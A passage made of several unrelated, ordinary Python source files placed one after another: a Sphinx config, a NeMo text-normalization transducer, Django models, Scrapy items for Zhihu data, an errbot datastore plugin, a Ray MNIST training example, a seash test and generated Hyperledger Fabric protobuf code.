return loss, L_pos, L_neg, L_prior
def get_embeddings(self):
"""Gets trained embeddings and reshapes them into (T, V, k)"""
embeddings = (
self.rho.cpu()
.weight.data.reshape((self.T, len(self.dictionary), self.k))
.numpy()
)
return embeddings
|
# -*- coding: utf-8 -*-
#
# Ayame documentation build configuration file, created by
# sphinx-quickstart on Tue Feb 03 21:49:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('..'))
import ayame
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Ayame'
copyright = '2011-2015, Akinori Hattori'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ayame.__version__.split('+', 1)[0]
# The full version, including alpha/beta/rc tags.
release = ayame.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = '{} {}'.format(project, version)
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ayame'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ayame.tex', 'Ayame Documentation',
'Akinori Hattori', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ayame', 'Ayame Documentation',
['Akinori Hattori'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ayame', 'Ayame Documentation',
'Akinori Hattori', 'Ayame', 'An Apache Wicket-like component based WSGI framework',
'Web development'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
}
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
# Copyright 2015 and onwards Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nemo_text_processing.text_normalization.graph_utils import (
NEMO_CHAR,
NEMO_DIGIT,
GraphFst,
delete_space,
insert_space,
)
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
class TimeFst(GraphFst):
"""
Finite state transducer for verbalizing time, e.g.
time { hours: "12" minutes: "30" } -> 12:30
time { hours: "1" minutes: "12" } -> 01:12
time { hours: "2" suffix: "a.m." } -> 02:00 a.m.
"""
def __init__(self):
super().__init__(name="time", kind="verbalize")
add_leading_zero_to_double_digit = (NEMO_DIGIT + NEMO_DIGIT) | (pynutil.insert("0") + NEMO_DIGIT)
hour = (
pynutil.delete("hours:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_DIGIT, 1)
+ pynutil.delete("\"")
)
minute = (
pynutil.delete("minutes:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_DIGIT, 1)
+ pynutil.delete("\"")
)
suffix = (
delete_space
+ insert_space
+ pynutil.delete("suffix:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_CHAR - " ", 1)
+ pynutil.delete("\"")
)
optional_suffix = pynini.closure(suffix, 0, 1)
zone = (
delete_space
+ insert_space
+ pynutil.delete("zone:")
+ delete_space
+ pynutil.delete("\"")
+ pynini.closure(NEMO_CHAR - " ", 1)
+ pynutil.delete("\"")
)
optional_zone = pynini.closure(zone, 0, 1)
graph = (
hour @ add_leading_zero_to_double_digit
+ delete_space
+ pynutil.insert(":")
+ (minute @ add_leading_zero_to_double_digit)
+ optional_suffix
+ optional_zone
)
delete_tokens = self.delete_tokens(graph)
self.fst = delete_tokens.optimize()
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from datetime import datetime
class CustomUser(AbstractUser):
phoneNumber = models.CharField(blank=True, max_length=255)
color = models.CharField(
'颜色', blank=True, max_length=9, default=r"#ffffffff") # "#ff123456"
gender_choices = (
('male', '男'),
('female', '女')
)
nick_name = models.CharField('昵称', max_length=50, default='')
birthday = models.DateField('生日', null=True, blank=True)
gender = models.CharField(
'性别', max_length=10, choices=gender_choices, default='female')
adress = models.CharField('地址', max_length=100, default='')
mobile = models.CharField('手机号', max_length=11, null=True, blank=True)
image = models.ImageField(upload_to='image/%Y%m',
default='image/default.png', max_length=100)
def __str__(self):
return self.username + " (邮箱:" + self.email + ")"
class Meta:
db_table = 'users'
verbose_name = '用户信息'
verbose_name_plural = verbose_name
class EmailVerifyRecord(models.Model):
send_choices = (
('register', '注册'),
('forget', '找回密码'),
('update_email', '修改邮箱')
)
code = models.CharField('验证码', max_length=20)
email = models.EmailField('邮箱', max_length=50)
send_type = models.CharField(choices=send_choices, max_length=30)
send_time = models.DateTimeField(default=datetime.now)
class Meta:
verbose_name = '邮箱验证码'
verbose_name_plural = verbose_name
class Banner(models.Model):
title = models.CharField('标题', max_length=100)
image = models.ImageField('轮播图', upload_to='banner/%Y%m', max_length=100)
url = models.URLField('访问地址', max_length=200)
index = models.IntegerField('顺序', default=100)
add_time = models.DateTimeField('添加时间', default=datetime.now)
class Meta:
verbose_name = '轮播图'
verbose_name_plural = verbose_name
|
import datetime
import scrapy
from itemloaders.processors import MapCompose
from w3lib.html import remove_tags
from mtianyanSpider.items import MysqlItem, ElasticSearchItem
from mtianyanSpider.settings import SQL_DATETIME_FORMAT
from mtianyanSpider.sites.zhihu.es_zhihu import ZhiHuQuestionIndex, ZhiHuAnswerIndex
from mtianyanSpider.utils.common import extract_num, extract_num_include_dot, real_time_count
from mtianyanSpider.utils.string_util import exclude_none
ZHIHU_QUESTION_COUNT_INIT = 0
ZHIHU_ANSWER_COUNT_INIT = 0
class ZhihuQuestionItem(scrapy.Item, MysqlItem, ElasticSearchItem):
url_object_id = scrapy.Field()
question_id = scrapy.Field()
title = scrapy.Field()
content = scrapy.Field(
input_processor=MapCompose(exclude_none),
)
topics = scrapy.Field()
answer_num = scrapy.Field()
comments_num = scrapy.Field()
watch_user_num = scrapy.Field()
click_num = scrapy.Field()
url = scrapy.Field()
crawl_time = scrapy.Field()
def clean_data(self):
self["question_id"] = self["question_id"][0]
self["topics"] = ",".join(self["topics"])
self["url"] = self["url"][0]
self["title"] = "".join(self["title"])
try:
self["content"] = "".join(self["content"])
self["content"] = remove_tags(self["content"])
except BaseException:
self["content"] = "无"
try:
self["answer_num"] = extract_num("".join(self["answer_num"]))
except BaseException:
self["answer_num"] = 0
self["comments_num"] = extract_num("".join(self["comments_num"]))
if len(self["watch_user_num"]) == 2:
watch_user_num_click = self["watch_user_num"]
self["watch_user_num"] = extract_num_include_dot(watch_user_num_click[0])
self["click_num"] = extract_num_include_dot(watch_user_num_click[1])
else:
watch_user_num_click = self["watch_user_num"]
self["watch_user_num"] = extract_num_include_dot(watch_user_num_click[0])
self["click_num"] = 0
self["crawl_time"] = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)
def save_to_mysql(self):
# 插入知乎question表的sql语句
insert_sql = """
insert into zhihu_question(url_object_id,question_id, title, content,topics,
answer_num, comments_num,watch_user_num, click_num, url,
crawl_time
)
VALUES (%s, %s, %s, %s, %s
, %s, %s, %s, %s, %s,
%s)
ON DUPLICATE KEY UPDATE
content=VALUES(content), answer_num=VALUES(answer_num), comments_num=VALUES(comments_num),
watch_user_num=VALUES(watch_user_num), click_num=VALUES(click_num)
"""
self.clean_data()
sql_params = (
self['url_object_id'], self["question_id"], self["title"], self["content"], self["topics"],
self["answer_num"], self["comments_num"], self["watch_user_num"], self["click_num"], self['url'],
self["crawl_time"])
return insert_sql, sql_params
def save_to_es(self):
self.clean_data()
zhihu = ZhiHuQuestionIndex()
zhihu.meta.id = self["url_object_id"]
zhihu.question_id = self["question_id"]
zhihu.title = self["title"]
zhihu.content = self["content"]
zhihu.topics = self["topics"]
zhihu.answer_num = self["answer_num"]
zhihu.comments_num = self["comments_num"]
zhihu.watch_user_num = self["watch_user_num"]
zhihu.click_num = self["click_num"]
zhihu.url = self["url"]
zhihu.title_keyword = self["title"]
zhihu.crawl_time = self["crawl_time"]
real_time_count('zhihu_question_count', ZHIHU_QUESTION_COUNT_INIT)
zhihu.save()
def help_fields(self):
for field in self.fields:
print(field, "= scrapy.Field()")
class ZhihuAnswerItem(scrapy.Item, MysqlItem, ElasticSearchItem):
url_object_id = scrapy.Field()
answer_id = scrapy.Field()
question_id = scrapy.Field()
author_id = scrapy.Field()
author_name = scrapy.Field()
content = scrapy.Field()
praise_num = scrapy.Field()
comments_num = scrapy.Field()
url = scrapy.Field()
create_time = scrapy.Field()
update_time = scrapy.Field()
crawl_time = scrapy.Field()
def clean_data(self):
try:
self["praise_num"] = extract_num("".join(self["praise_num"]))
except BaseException:
self["praise_num"] = 0
self["comments_num"] = extract_num("".join(self["comments_num"]))
self["create_time"] = datetime.datetime.fromtimestamp(
self["create_time"]).strftime(SQL_DATETIME_FORMAT)
try:
self["update_time"] = datetime.datetime.fromtimestamp(
self["update_time"]).strftime(SQL_DATETIME_FORMAT)
except:
self["update_time"] = self["create_time"]
self["crawl_time"] = self["crawl_time"].strftime(SQL_DATETIME_FORMAT)
self["content"] = remove_tags(self["content"])
def save_to_mysql(self):
self.clean_data()
# 插入知乎answer表的sql语句
insert_sql = """
insert into zhihu_answer(url_object_id, answer_id, question_id, author_id, author_name,
content, praise_num, comments_num,url,create_time,
update_time, crawl_time)
VALUES (%s, %s, %s, %s, %s,
%s, %s, %s, %s, %s,
%s, %s)
ON DUPLICATE KEY UPDATE
content=VALUES(content), comments_num=VALUES(comments_num), praise_num=VALUES(praise_num),
update_time=VALUES(update_time), author_name=VALUES(author_name)
"""
sql_params = (
self["url_object_id"], self["answer_id"], self["question_id"], self["author_id"], self["author_name"],
self["content"], self["praise_num"], self["comments_num"], self["url"], self["create_time"],
self["update_time"], self["crawl_time"]
)
return insert_sql, sql_params
def save_to_es(self):
self.clean_data()
zhihu = ZhiHuAnswerIndex()
zhihu.meta.id = self["url_object_id"]
zhihu.answer_id = self["answer_id"]
zhihu.question_id = self["question_id"]
zhihu.author_id = self["author_id"]
zhihu.author_name = self["author_name"]
zhihu.content = self["content"]
zhihu.praise_num = self["praise_num"]
zhihu.comments_num = self["comments_num"]
zhihu.url = self["url"]
zhihu.create_time = self["create_time"]
zhihu.update_time = self["update_time"]
zhihu.crawl_time = self["crawl_time"]
real_time_count("zhihu_answer_count", ZHIHU_QUESTION_COUNT_INIT)
zhihu.save()
def help_fields(self):
for field in self.field_list:
print(field, "= scrapy.Field()")
|
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import datetime
import logging
from typing import Any
import os
from jsonpickle import encode, decode
from errbot.storage.base import StorageBase, StoragePluginBase
from gcloud import datastore
log = logging.getLogger('errbot.storage.gcd')
ACCOUNT_FILE_ENTRY = 'accountfile'
PROJECT_ENTRY = 'project'
NAMESPACE_ENTRY = 'namespace'
DEFAULT_NAMESPACE = 'Errbot' # DS namepace not Errbot namespace
class CloudDatastore(StorageBase):
def __init__(self, namespace, kind, project, credentials):
log.debug('Try to authenticate Google cloud storage on %s with %s' % (project, credentials))
self.ds = datastore.Client.from_service_account_json(credentials, project=project, namespace=namespace)
log.debug('API built %s', self.ds)
self.kind = kind
def _gkey(self, key):
return self.ds.key(self.kind, key)
def _get_all(self):
query = self.ds.query(kind=self.kind)
return list(query.fetch())
def get(self, key: str) -> Any:
resp = self.ds.get(self._gkey(key))
if not resp:
raise KeyError("%s doesn't exist." % key)
return decode(resp['value'])
def remove(self, key: str):
key = self.ds.key(self.kind, key)
self.ds.delete(key)
def set(self, key: str, value: Any) -> None:
ent = datastore.Entity(key=self._gkey(key), exclude_from_indexes=['value'])
ent['value'] = encode(value)
self.ds.put(ent)
def len(self):
return len(self._get_all()) # TODO: optimize
def keys(self):
return [ent.key.name for ent in self._get_all()]
def close(self) -> None:
pass
class CloudDataStorePlugin(StoragePluginBase):
def __init__(self, bot_config):
super().__init__(bot_config)
if PROJECT_ENTRY not in self._storage_config:
raise Exception('You need to specify a project in your config.py like this: STORAGE_CONFIG={"project":"albator"}')
self.credentials = self._storage_config[ACCOUNT_FILE_ENTRY] if ACCOUNT_FILE_ENTRY in self._storage_config else os.path.join(bot_config.BOT_DATA_DIR, 'servacc.json')
self.prj = self._storage_config[PROJECT_ENTRY]
self.ds_namespace = self._storage_config[NAMESPACE_ENTRY] if NAMESPACE_ENTRY in self._storage_config else DEFAULT_NAMESPACE
def open(self, namespace: str) -> StorageBase:
return CloudDatastore(kind=namespace,
namespace=self.ds_namespace, # yes this is confusing but this is the mapping.
project= self.prj,
credentials=self.credentials)
|
import argparse
# __import_begin__
import os
# Pytorch imports
import torch
from torch.optim import Adam
from torch.utils.data import DataLoader, random_split
from torch.nn import functional as F
from torchvision import transforms
from torchvision.datasets import MNIST
# Ray imports
from ray.util.sgd import TorchTrainer
from ray.util.sgd.torch import TrainingOperator
# PTL imports
from pytorch_lightning.core.lightning import LightningModule
# __import_end__
# __ptl_begin__
class LitMNIST(LightningModule):
# We take in an additional config parameter here. But this is not required.
def __init__(self, config):
super().__init__()
# mnist images are (1, 28, 28) (channels, width, height)
self.layer_1 = torch.nn.Linear(28 * 28, 128)
self.layer_2 = torch.nn.Linear(128, 256)
self.layer_3 = torch.nn.Linear(256, 10)
self.config = config
def forward(self, x):
batch_size, channels, width, height = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = torch.relu(x)
x = self.layer_2(x)
x = torch.relu(x)
x = self.layer_3(x)
x = torch.log_softmax(x, dim=1)
return x
def configure_optimizers(self):
return Adam(self.parameters(), lr=self.config["lr"])
def setup(self, stage):
# transforms for images
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))
])
# prepare transforms standard to MNIST
mnist_train = MNIST(
os.getcwd(), train=True, download=True, transform=transform)
self.mnist_train, self.mnist_val = random_split(
mnist_train, [55000, 5000])
def train_dataloader(self):
return DataLoader(
self.mnist_train, batch_size=self.config["batch_size"])
def val_dataloader(self):
return DataLoader(self.mnist_val, batch_size=self.config["batch_size"])
def training_step(self, batch, batch_idx):
x, y = batch
logits = self(x)
loss = F.nll_loss(logits, y)
return loss
def validation_step(self, batch, batch_idx):
x, y = batch
logits = self(x)
loss = F.nll_loss(logits, y)
_, predicted = torch.max(logits.data, 1)
num_correct = (predicted == y).sum().item()
num_samples = y.size(0)
return {"val_loss": loss.item(), "val_acc": num_correct / num_samples}
# __ptl_end__
# __train_begin__
def train_mnist(num_workers=1, use_gpu=False, num_epochs=5):
Operator = TrainingOperator.from_ptl(LitMNIST)
trainer = TorchTrainer(
training_operator_cls=Operator,
num_workers=num_workers,
config={
"lr": 1e-3,
"batch_size": 64
},
use_gpu=use_gpu,
use_tqdm=True,
)
for i in range(num_epochs):
stats = trainer.train()
print(stats)
print(trainer.validate())
print("Saving model checkpoint to ./model.pt")
trainer.save("./model.pt")
print("Model Checkpointed!")
trainer.shutdown()
print("success!")
# __train_end__
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--address",
required=False,
type=str,
help="the address to use for Ray")
parser.add_argument(
"--num-workers",
"-n",
type=int,
default=1,
help="Sets number of workers for training.")
parser.add_argument(
"--use-gpu",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--num-epochs",
type=int,
default=5,
help="How many epochs to train "
"for.")
parser.add_argument(
"--smoke-test",
action="store_true",
default=False,
help="Finish quickly for testing.")
args, _ = parser.parse_known_args()
import ray
if args.smoke_test:
ray.init(num_cpus=2)
args.num_epochs = 1
else:
ray.init(address=args.address)
train_mnist(
num_workers=args.num_workers,
use_gpu=args.use_gpu,
num_epochs=args.num_epochs)
|
"""
Uploads and runs a simple repy file to make sure no errors gets thrown, and
proceeds to download and remove the file from the node to test seash's file
recognition.
"""
#pragma out The specified file(s) could not be found. Please check the filename.
import seash
import sys
# Prevent printing to console by using test_results.txt as a text dump and redirecting output there
orig_stdout = sys.stdout
sys.stdout = open("test_results.txt", "w")
command_list = [
'loadkeys guest0',
'as guest0',
'browse',
'on %1',
'loadkeys guest0',
'as guest0',
'upload example.1.1.r2py sample_file',
'run example.1.1.r2py test_argument',
'show log',
'show files',
'start sample_file test_argument',
'show log',
'download sample_file',
'savestate testing_state'
]
seash.command_loop(command_list)
sys.stdout.close()
# Resets stdout to allow printing to console to allow UTF to catch errors printed by seash
sys.stdout = orig_stdout
command_list = [
'loadkeys guest0',
'as guest0',
'loadstate testing_state',
'delete example.1.1.r2py',
'upload example.1.1.r2py',
'reset',
'download example.1.1.r2py'
]
seash.command_loop(command_list)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: orderer/ab.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from common import common_pb2 as common_dot_common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='orderer/ab.proto',
package='orderer',
syntax='proto3',
serialized_pb=_b('\n\x10orderer/ab.proto\x12\x07orderer\x1a\x13\x63ommon/common.proto\"3\n\x11\x42roadcastResponse\x12\x1e\n\x06Status\x18\x01 \x01(\x0e\x32\x0e.common.Status\"\xa8\x01\n\x08SeekInfo\x12*\n\x05Start\x18\x01 \x01(\x0e\x32\x1b.orderer.SeekInfo.StartType\x12\x17\n\x0fSpecifiedNumber\x18\x02 \x01(\x04\x12\x12\n\nWindowSize\x18\x03 \x01(\x04\x12\x0f\n\x07\x43hainID\x18\x04 \x01(\x0c\"2\n\tStartType\x12\n\n\x06NEWEST\x10\x00\x12\n\n\x06OLDEST\x10\x01\x12\r\n\tSPECIFIED\x10\x02\"!\n\x0f\x41\x63knowledgement\x12\x0e\n\x06Number\x18\x01 \x01(\x04\"o\n\rDeliverUpdate\x12\x33\n\x0f\x41\x63knowledgement\x18\x01 \x01(\x0b\x32\x18.orderer.AcknowledgementH\x00\x12!\n\x04Seek\x18\x02 \x01(\x0b\x32\x11.orderer.SeekInfoH\x00\x42\x06\n\x04Type\"Z\n\x0f\x44\x65liverResponse\x12\x1f\n\x05\x45rror\x18\x01 \x01(\x0e\x32\x0e.common.StatusH\x00\x12\x1e\n\x05\x42lock\x18\x02 \x01(\x0b\x32\r.common.BlockH\x00\x42\x06\n\x04Type2\x95\x01\n\x0f\x41tomicBroadcast\x12?\n\tBroadcast\x12\x10.common.Envelope\x1a\x1a.orderer.BroadcastResponse\"\x00(\x01\x30\x01\x12\x41\n\x07\x44\x65liver\x12\x16.orderer.DeliverUpdate\x1a\x18.orderer.DeliverResponse\"\x00(\x01\x30\x01\x42.Z,github.com/hyperledger/fabric/protos/ordererb\x06proto3')
,
dependencies=[common_dot_common__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_SEEKINFO_STARTTYPE = _descriptor.EnumDescriptor(
name='StartType',
full_name='orderer.SeekInfo.StartType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='NEWEST', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OLDEST', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SPECIFIED', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=222,
serialized_end=272,
)
_sym_db.RegisterEnumDescriptor(_SEEKINFO_STARTTYPE)
_BROADCASTRESPONSE = _descriptor.Descriptor(
name='BroadcastResponse',
full_name='orderer.BroadcastResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Status', full_name='orderer.BroadcastResponse.Status', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=50,
serialized_end=101,
)
_SEEKINFO = _descriptor.Descriptor(
name='SeekInfo',
full_name='orderer.SeekInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Start', full_name='orderer.SeekInfo.Start', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='SpecifiedNumber', full_name='orderer.SeekInfo.SpecifiedNumber', index=1,
number=2, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='WindowSize', full_name='orderer.SeekInfo.WindowSize', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ChainID', full_name='orderer.SeekInfo.ChainID', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_SEEKINFO_STARTTYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=104,
serialized_end=272,
)
_ACKNOWLEDGEMENT = _descriptor.Descriptor(
name='Acknowledgement',
full_name='orderer.Acknowledgement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Number', full_name='orderer.Acknowledgement.Number', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=274,
serialized_end=307,
)
_DELIVERUPDATE = _descriptor.Descriptor(
name='DeliverUpdate',
full_name='orderer.DeliverUpdate',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Acknowledgement', full_name='orderer.DeliverUpdate.Acknowledgement', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='Seek', full_name='orderer.DeliverUpdate.Seek', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='orderer.DeliverUpdate.Type',
index=0, containing_type=None, fields=[]),
],
serialized_start=309,
serialized_end=420,
)
_DELIVERRESPONSE = _descriptor.Descriptor(
name='DeliverResponse',
full_name='orderer.DeliverResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Error', full_name='orderer.DeliverResponse.Error', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='Block', full_name='orderer.DeliverResponse.Block', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='orderer.DeliverResponse.Type',
index=0, containing_type=None, fields=[]),
],
serialized_start=422,
serialized_end=512,
)
_BROADCASTRESPONSE.fields_by_name['Status'].enum_type = common_dot_common__pb2._STATUS
_SEEKINFO.fields_by_name['Start'].enum_type = _SEEKINFO_STARTTYPE
_SEEKINFO_STARTTYPE.containing_type = _SEEKINFO
_DELIVERUPDATE.fields_by_name['Acknowledgement'].message_type = _ACKNOWLEDGEMENT
_DELIVERUPDATE.fields_by_name['Seek'].message_type = _SEEKINFO
_DELIVERUPDATE.oneofs_by_name['Type'].fields.append(
_DELIVERUPDATE.fields_by_name['Acknowledgement'])
_DELIVERUPDATE.fields_by_name['Acknowledgement'].containing_oneof = _DELIVERUPDATE.oneofs_by_name['Type']
_DELIVERUPDATE.oneofs_by_name['Type'].fields.append(
_DELIVERUPDATE.fields_by_name['Seek'])
_DELIVERUPDATE.fields_by_name['Seek'].containing_oneof = _DELIVERUPDATE.oneofs_by_name['Type']
